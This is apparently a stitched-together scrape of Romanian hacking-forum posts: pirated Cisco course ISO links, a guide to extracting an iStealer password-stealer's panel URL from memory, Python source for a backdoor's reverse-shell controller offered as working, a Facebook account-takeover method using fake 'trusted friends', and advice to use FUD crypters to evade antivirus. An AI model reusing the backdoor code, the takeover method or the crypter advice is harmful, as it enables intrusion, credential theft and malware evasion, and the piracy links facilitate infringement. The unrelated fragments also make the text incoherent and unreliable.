Leaderboard

Files: Cisco Networking Academy Program – CCNA Semester 1 Networking Basics v3.1.1.iso 152 MB Cisco Networking Academy Program – CCNA Semester 2 Routers And Routing Basics v3.1.1.iso 170 MB Cisco Networking Academy Program – CCNA Semester 3 Switching Basic And Intermediate Routing v3.1.1.iso 135 MB Cisco Networking Academy Program – CCNA Semester 4 Wan Technologies V3.1.1.iso 116 MB cisco Networking Academy Program – CCNP Remote Acces = [BCRAN] 642-821 Version 3.1.iso 155 MB Cisco Networking Academy Program – CCNP Advanced Routing = [BSCI] 642-801 Version 3.1.iso 143 MB CIsco Networking Academy Program – CCNP Multilayer Switching = [BCMSN] 642-811 Version 4.0.iso 115 MB Cisco Networking Academy Program – CCNP Network Troubleshooting = [CIT] 642-831 Version 4.0.iso 110 MB Download 1: https://rs959tl3.rapidshare.com/#!download|959l3|363601026|heo8x_CiscoNetworking_AcademyProgram_CCNACCNP_SPVN.part1.rar|208666|R~C540AE63463214C92C0155512C41222A|0|0 Download 2: https://rs859l34.rapidshare.com/#!download|859tl|363600601|heo8x_CiscoNetworking_AcademyProgram_CCNACCNP_SPVN.part2.rar|23674|R~C656B0C44D71960ACF3AFAE097711F55|0|0 Sursa: Cisco Networking Academy Program CCNA CCNP | ScriptLeech [dot] com $.cei care vor sa ajute, postati mirrors ca sa ramana cat mai mult.

presupunem ca suntem in posesia unui server de istealer si dorim sa aflam adresa control panelului (locul unde ajung parolele furate) Aplicatii necesare: 1. Process explorer 2. Server istealer In primul si in primul rand se recomanda folosirea unui pc dedicat pt teste de genu (pc real/ vmware/virtual pc etc ) pentru a ne feri eventualele experiente neplacute. Intrucat serverele de istealer au obiceiul sa dispara imediat dupa ce "isi fac treaba" trebuie sa ne asiguram ca procesul ramane in viata pe toata durata acestei analize Click dr pe procesul in cauza si ii suspendam activitatea odata suspendat procesul ne putem continua analiza linistiti properties... strings... ne intereseaza in special stringurile din memorie, asa ca... urmatorul pas e sa aruncam un ochi prin stringuri dupa siruri de caractere gen "http://" "www" "index.php" ".com" etc and... surprize... acuma... la adresa respectiva ar trebui sa gasim ceva de genu... sau in cazul versiunilor mai vechi... job done.

A fost gandit ca un simplu backdoor dar mai trebuie lucrat la el, este in stare functionala asa ca am hotarat sa vi-l arat si voua , sa va dati cu parerea la ce ar trebui imbunatatit adaugat etc . Known bugs: Daca dati dir de exemplu intr-un folder unde sunt multe fisiere controller-ul va va da eroarea : [WARNING] Checksum mismatch !!! . Rezolvare ? Trebuie sa impun o limita asupra fluxului de date trimise prin socket de la server catre controller. Nu stiu daca va va fi de folos dar poate va va ajuta sa intelegeti cum functioneaza modelul client <-> server ( pe mine m-a ajutat mult ! ) si ma ajutat sa nu ma plictisesc prea tare in weekend . controller: Python code - 102 lines - codepad app (server): Python code - 148 lines - codepad Mostra : Controller: import zlib import struct from Crypto.Cipher import AES import argparse import socket import sys import re key = "s3cr3t0stuff0u0mad3bro?" class CheckSumError(Exception): pass def _lazysecret(secret, blocksize=32, padding='}'): """pads secret if not legal AES block size (16, 24, 32)""" if not len(secret) in (16, 24, 32): return secret + (blocksize - len(secret)) * padding return secret def encrypt(plaintext, secret, lazy=True, checksum=True): """encrypt plaintext with secret plaintext - content to encrypt secret - secret to encrypt plaintext lazy - pad secret if less than legal blocksize (default: True) checksum - attach crc32 byte encoded (default: True) returns ciphertext """ secret = _lazysecret(secret) if lazy else secret encobj = AES.new(secret, AES.MODE_CFB) if checksum: plaintext += struct.pack("i", zlib.crc32(plaintext)) return encobj.encrypt(plaintext) def decrypt(ciphertext, secret, lazy=True, checksum=True): """decrypt ciphertext with secret ciphertext - encrypted content to decrypt secret - secret to decrypt ciphertext lazy - pad secret if less than legal blocksize (default: True) checksum - verify crc32 byte encoded checksum (default: True) returns plaintext """ secret = _lazysecret(secret) if lazy else secret encobj = AES.new(secret, AES.MODE_CFB) plaintext = encobj.decrypt(ciphertext) if checksum: crc, plaintext = (plaintext[-4:], plaintext[:-4]) if not crc == struct.pack("i", zlib.crc32(plaintext)): raise CheckSumError("[WARNING] Checksum mismatch !!!") return plaintext def main(): desc = """Reverse shell handler: controller.exe -l ip port to listen for connections!""" parser = argparse.ArgumentParser(description=desc) parser.add_argument('ip', help='IP address for listening or connecting.') parser.add_argument('port', help='Port for listening or connecting.') group = parser.add_mutually_exclusive_group() group.add_argument('-l', action='store_true', help='Setup a listening server.') print '[INFO] Parsing arguments...' args = parser.parse_args() print '[INFO] Setting the socket...' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if args.l == True: print '[INFO] Binding on : %s:%s' %(args.ip, args.port) sock.bind((args.ip, int(args.port))) print '[INFO] Socket listening for connections...' sock.listen(5) print '[INFO] All set!' app_socket, app_ip = sock.accept() print '[INFO] Server attempting to connect! ' while True: data = decrypt(app_socket.recv(1024), key) print data cmd = raw_input(">>>") if cmd == "exit": app_socket.send(encrypt("/close", key)) sock.close() sys.exit(0) else: app_socket.send(encrypt(cmd, key)) if __name__ == '__main__': main() Le: apare controller.exe la descriere fiindca intentioenz sa il fac ca exe cu py2exe xD .

OpenVPN Technologies is a privately held company based in the Pleasanton, California, integrating a suite of leading-edge networking and software technologies. OpenVPN Technologies has designed and deployed a virtual network software that provides secure, reliable, and scalable communication services, not only fulfilling the requirements of the traditional virtual private network (VPN) market, but also addressing the demands of next wave web-scale VPN services. OpenVPN, our award-winning open source VPN product, has established itself as a de-facto standard in the open source networking space, with over 3 million downloads since inception. OpenVPN Technologies is the provider of next-generation secure and scalable communication services, implementing its business plan through strategic partnerships with key application software providers and marketing its product to SMB market place through its OpenVPN web site that is experiencing more than 250,000 new SMB users, prospects, and customers per month. Following the successful inception of the OpenVPN Project in 2002, Francis Dinha and James Yonan co-founded OpenVPN Technologies, Inc. to secure a solid foundation for OpenVPN and further develop its commercial potential. OFFICIAL: OpenVPN - Open Source VPN TUTORIAL: https://www.vpntunnel.se/howto/linux.pdf

Facebook "Trusted friends" Security Feature Easily Exploitable POSTED BY THN REPORTER ON 10/31/2011 12:10:00 AM Last week Facebook announced that in one day 600,000 accounts possibly get hacked. Another possible solution for Facebook to combat security issues is to find 3 to 5 "Trusted friends". Facebook will be adding two new security features that will allow users to regain control of their account if it gets hijacked. In Facebook's case, the keys are codes, and the user can choose from three to five "Trusted friends" who are then provided with a code. If you ever get locked out of your account (and you can't access your email to follow the link after resetting your Facebook password), you gather all the codes and use them to gain access to it again. Yet This method is used by hackers to hack most of the Facebook account using little bit of Social Engineering from last 5-6 Months according to me. Let us know, how this works... How its Exploitable: This Exploit is 90% Successful on the victims who add friends without knowing them or just for increasing the number of Friends. This method to hack a Facebook Account only works if 3 trusted friends agree to give you the security code ! Another Idea, Why not Create 3 fake accounts and send Friend Request to Victim. Once your 3 Fake Accounts become friends with your victims facebook account, you can select those 3 Accounts to get the Security Code and Reset the password of Victim. Here a Complete Demonstration of Hacking Method on HackersOnlineClub. Other Serious Facebook Vulnerability in Last Week Last Week Nathan Power from SecurityPentest has discovered new Facebook Vulnerability, that can easily attach EXE files in messages,cause possible User Credentials to be Compromised . Not even Account Security, Also there are lots of Privacy Issues in Facebook,like Nelson Novaes Neto, a Brazilian (independent) Security and Behavior Research have analyze a privacy issue in Facebook Ticker that allows any person chasing you without your knowledge or consent . Facebook should takes these privacy issues & security holes very seriously. Demo: http://www.hackersonlineclub.com/hack-facebook-account Sursa: Facebook "Trusted friends" Security Feature Easily Exploitable ~ THN : The Hacker News

Cauta un crypter bun. Gasesti o gramada pe forum. E destul de bun, mie mi-a fost de folos si asta : http://rstcenter.com/forum/42103-li0n-polymorphic-crypter-v1-1-%5Bfud%5D.rst Le poti testa pe aman2 sa vezi de care esti mai multumit.